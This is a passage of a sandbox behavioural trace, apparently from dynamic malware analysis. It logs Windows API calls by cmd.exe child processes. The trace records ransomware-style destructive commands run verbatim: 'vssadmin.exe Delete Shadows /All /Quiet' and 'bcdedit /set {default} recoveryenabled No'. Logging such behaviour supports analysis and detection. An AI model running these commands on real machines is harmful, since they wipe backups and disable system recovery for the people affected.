lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1af9f0*="Desktop") returned 0x25 [0046.313] SetErrorMode (uMode=0x0) returned 0x1 [0046.313] GetProcessHeap () returned 0x1c0000 [0046.313] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1c1320, Size=0x76) returned 0x1c1320 [0046.313] GetProcessHeap () returned 0x1c0000 [0046.313] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1c1320) returned 0x76 [0046.313] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.313] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.314] GetProcessHeap () returned 0x1c0000 [0046.314] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x128) returned 0x1d5c50 [0046.314] GetProcessHeap () returned 0x1c0000 [0046.314] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x240) returned 0x1c13b0 [0046.315] GetProcessHeap () returned 0x1c0000 [0046.315] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1c13b0, Size=0x12a) returned 0x1c13b0 [0046.315] GetProcessHeap () returned 0x1c0000 [0046.315] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1c13b0) returned 0x12a [0046.315] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.315] GetProcessHeap () returned 0x1c0000 [0046.315] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xe8) returned 0x1c14f0 [0046.315] GetProcessHeap () returned 0x1c0000 [0046.315] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1c14f0, Size=0x7e) returned 0x1c14f0 [0046.315] GetProcessHeap () returned 0x1c0000 [0046.315] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1c14f0) returned 0x7e [0046.315] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.315] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1af760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af760) returned 0xffffffffffffffff [0046.315] GetLastError () returned 0x2 [0046.315] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x1af760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af760) returned 0xffffffffffffffff [0046.315] GetLastError () returned 0x2 [0046.315] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1af760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af760) returned 0xffffffffffffffff [0046.316] GetLastError () returned 0x2 [0046.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.316] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1af760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af760) returned 0x1d9fa0 [0046.316] GetProcessHeap () returned 0x1c0000 [0046.316] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1d4700, Size=0x8) returned 0x1d89e0 [0046.316] FindClose (in: hFindFile=0x1d9fa0 | out: hFindFile=0x1d9fa0) returned 1 [0046.316] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0046.316] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0046.316] GetProcessHeap () returned 0x1c0000 [0046.316] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x28) returned 0x1d4700 [0046.316] GetProcessHeap () returned 0x1c0000 [0046.316] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x218) returned 0x1c1580 [0046.316] GetProcessHeap () returned 0x1c0000 [0046.316] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x62) returned 0x1d9fa0 [0046.316] GetProcessHeap () returned 0x1c0000 [0046.316] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x420) returned 0x1c17a0 [0046.316] SetErrorMode (uMode=0x0) returned 0x0 [0046.316] SetErrorMode (uMode=0x1) returned 0x0 [0046.316] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1c17b0, lpFilePart=0x1af780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1af780*="Desktop") returned 0x25 [0046.316] SetErrorMode (uMode=0x0) returned 0x1 [0046.316] GetProcessHeap () returned 0x1c0000 [0046.316] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1c17a0, Size=0x76) returned 0x1c17a0 [0046.316] GetProcessHeap () returned 0x1c0000 [0046.316] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1c17a0) returned 0x76 [0046.316] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.317] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.317] GetProcessHeap () returned 0x1c0000 [0046.317] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x128) returned 0x1c1830 [0046.317] GetProcessHeap () returned 0x1c0000 [0046.317] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x240) returned 0x1c1960 [0046.317] GetProcessHeap () returned 0x1c0000 [0046.317] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1c1960, Size=0x12a) returned 0x1c1960 [0046.317] GetProcessHeap () returned 0x1c0000 [0046.317] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1c1960) returned 0x12a [0046.317] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.317] GetProcessHeap () returned 0x1c0000 [0046.317] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xe8) returned 0x1c1aa0 [0046.317] GetProcessHeap () returned 0x1c0000 [0046.317] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1c1aa0, Size=0x7e) returned 0x1c1aa0 [0046.317] GetProcessHeap () returned 0x1c0000 [0046.317] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1c1aa0) returned 0x7e [0046.317] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.317] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1af4f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af4f0) returned 0xffffffffffffffff [0046.317] GetLastError () returned 0x2 [0046.317] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x1af4f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af4f0) returned 0xffffffffffffffff [0046.317] GetLastError () returned 0x2 [0046.317] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1af4f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af4f0) returned 0xffffffffffffffff [0046.317] GetLastError () returned 0x2 [0046.318] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.318] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1af4f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af4f0) returned 0x1dbe00 [0046.318] FindClose (in: hFindFile=0x1dbe00 | out: hFindFile=0x1dbe00) returned 1 [0046.318] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0046.318] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0046.318] GetConsoleTitleW (in: lpConsoleTitle=0x1afa40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.318] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af7f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af7b8 | out: lpAttributeList=0x1af7f8, lpSize=0x1af7b8) returned 1 [0046.318] UpdateProcThreadAttribute (in: lpAttributeList=0x1af7f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af7a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af7f8, lpPreviousValue=0x0) returned 1 [0046.318] GetStartupInfoW (in: lpStartupInfo=0x1af910 | out: lpStartupInfo=0x1af910*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0046.318] GetProcessHeap () returned 0x1c0000 [0046.318] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x20) returned 0x1dc1f0 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0046.318] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.319] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.319] GetProcessHeap () returned 0x1c0000 [0046.319] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1dc1f0 | out: hHeap=0x1c0000) returned 1 [0046.319] GetProcessHeap () returned 0x1c0000 [0046.319] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x12) returned 0x1d5d80 [0046.319] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0046.319] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1af830*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe Delete Shadows /All /Quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af7e0 | out: lpCommandLine="vssadmin.exe Delete Shadows /All /Quiet", lpProcessInformation=0x1af7e0*(hProcess=0x58, hThread=0x54, dwProcessId=0x180, dwThreadId=0x2a8)) returned 1 [0046.327] CloseHandle (hObject=0x54) returned 1 [0046.327] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.327] GetProcessHeap () returned 0x1c0000 [0046.327] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1e0e20 | out: hHeap=0x1c0000) returned 1 [0046.327] GetEnvironmentStringsW () returned 0x1e0e20* [0046.327] GetProcessHeap () returned 0x1c0000 [0046.327] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xae8) returned 0x1e9a90 [0046.327] FreeEnvironmentStringsW (penv=0x1e0e20) returned 1 [0046.327] GetProcessHeap () returned 0x1c0000 [0046.327] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1d5d80 | out: hHeap=0x1c0000) returned 1 [0046.327] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af7f8 | out: lpAttributeList=0x1af7f8) [0046.327] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0046.327] _close (_FileHandle=4) returned 0 [0046.328] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0047.410] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x1afd18 | out: lpExitCode=0x1afd18*=0x0) returned 1 [0047.410] CloseHandle (hObject=0x60) returned 1 [0047.410] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x18a86000" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x35c" cmd_line = "C:\\Windows\\system32\\cmd.exe /C title 6881369|bcdedit /set {default} recoveryenabled No" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 16 os_tid = 0xb60 [0046.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fbb0 | out: lpSystemTimeAsFileTime=0x26fbb0*(dwLowDateTime=0x1a624d60, dwHighDateTime=0x1d5e3d9)) [0046.130] GetCurrentProcessId () returned 0xb54 [0046.130] GetCurrentThreadId () returned 0xb60 [0046.130] GetTickCount () returned 0x11564ad [0046.130] QueryPerformanceCounter (in: lpPerformanceCount=0x26fbb8 | out: lpPerformanceCount=0x26fbb8*=18805230487) returned 1 [0046.131] GetModuleHandleW (lpModuleName=0x0) returned 0x49eb0000 [0046.131] __set_app_type (_Type=0x1) [0046.131] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ed7810) returned 0x0 [0046.131] __getmainargs (in: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610, _DoWildCard=0, _StartInfo=0x49ede0f4 | out: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610) returned 0 [0046.131] GetCurrentThreadId () returned 0xb60 [0046.131] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb60) returned 0x3c [0046.132] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.132] GetProcAddress (hModule=0x76f20000, lpProcName="SetThreadUILanguage") returned 0x76f36d40 [0046.132] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.132] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.132] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fb48 | out: phkResult=0x26fb48*=0x0) returned 0x2 [0046.132] VirtualQuery (in: lpAddress=0x26fb30, lpBuffer=0x26fab0, dwLength=0x30 | out: lpBuffer=0x26fab0*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.132] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fab0, dwLength=0x30 | out: lpBuffer=0x26fab0*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.132] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fab0, dwLength=0x30 | out: lpBuffer=0x26fab0*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.132] VirtualQuery (in: lpAddress=0x174000, lpBuffer=0x26fab0, dwLength=0x30 | out: lpBuffer=0x26fab0*(BaseAddress=0x174000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.133] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fab0, dwLength=0x30 | out: lpBuffer=0x26fab0*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.133] GetConsoleOutputCP () returned 0x1b5 [0046.133] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.133] SetConsoleCtrlHandler (HandlerRoutine=0x49ed3184, Add=1) returned 1 [0046.133] _get_osfhandle (_FileHandle=1) returned 0x7 [0046.133] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0046.222] _get_osfhandle (_FileHandle=1) returned 0x7 [0046.222] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 1 [0046.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0046.223] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0046.223] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.223] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0046.223] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.223] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0046.223] GetEnvironmentStringsW () returned 0x458b40* [0046.223] GetProcessHeap () returned 0x440000 [0046.224] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa7c) returned 0x4595d0 [0046.224] FreeEnvironmentStringsW (penv=0x458b40) returned 1 [0046.224] GetProcessHeap () returned 0x440000 [0046.224] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x8) returned 0x4589c0 [0046.224] GetEnvironmentStringsW () returned 0x458b40* [0046.224] GetProcessHeap () returned 0x440000 [0046.224] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa7c) returned 0x45a060 [0046.224] FreeEnvironmentStringsW (penv=0x458b40) returned 1 [0046.224] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea08 | out: phkResult=0x26ea08*=0x44) returned 0x0 [0046.224] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x0, lpData=0x26ea20*=0x18, lpcbData=0x26ea04*=0x1000) returned 0x2 [0046.224] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x4, lpData=0x26ea20*=0x1, lpcbData=0x26ea04*=0x4) returned 0x0 [0046.224] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x0, lpData=0x26ea20*=0x1, lpcbData=0x26ea04*=0x1000) returned 0x2 [0046.224] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x4, lpData=0x26ea20*=0x0, lpcbData=0x26ea04*=0x4) returned 0x0 [0046.224] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x4, lpData=0x26ea20*=0x40, lpcbData=0x26ea04*=0x4) returned 0x0 [0046.224] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x4, lpData=0x26ea20*=0x40, lpcbData=0x26ea04*=0x4) returned 0x0 [0046.224] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x0, lpData=0x26ea20*=0x40, lpcbData=0x26ea04*=0x1000) returned 0x2 [0046.224] RegCloseKey (hKey=0x44) returned 0x0 [0046.224] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea08 | out: phkResult=0x26ea08*=0x44) returned 0x0 [0046.224] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x0, lpData=0x26ea20*=0x40, lpcbData=0x26ea04*=0x1000) returned 0x2 [0046.224] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x4, lpData=0x26ea20*=0x1, lpcbData=0x26ea04*=0x4) returned 0x0 [0046.225] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x0, lpData=0x26ea20*=0x1, lpcbData=0x26ea04*=0x1000) returned 0x2 [0046.225] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x4, lpData=0x26ea20*=0x0, lpcbData=0x26ea04*=0x4) returned 0x0 [0046.225] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x4, lpData=0x26ea20*=0x9, lpcbData=0x26ea04*=0x4) returned 0x0 [0046.225] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x4, lpData=0x26ea20*=0x9, lpcbData=0x26ea04*=0x4) returned 0x0 [0046.225] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea00, lpData=0x26ea20, lpcbData=0x26ea04*=0x1000 | out: lpType=0x26ea00*=0x0, lpData=0x26ea20*=0x9, lpcbData=0x26ea04*=0x1000) returned 0x2 [0046.225] RegCloseKey (hKey=0x44) returned 0x0 [0046.225] time (in: timer=0x0 | out: timer=0x0) returned 0x5e47aa56 [0046.225] srand (_Seed=0x5e47aa56) [0046.225] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 6881369|bcdedit /set {default} recoveryenabled No" [0046.225] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 6881369|bcdedit /set {default} recoveryenabled No" [0046.225] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.225] GetProcessHeap () returned 0x440000 [0046.225] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x218) returned 0x45aaf0 [0046.225] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x45ab00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0046.225] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.225] GetEnvironmentVariableW 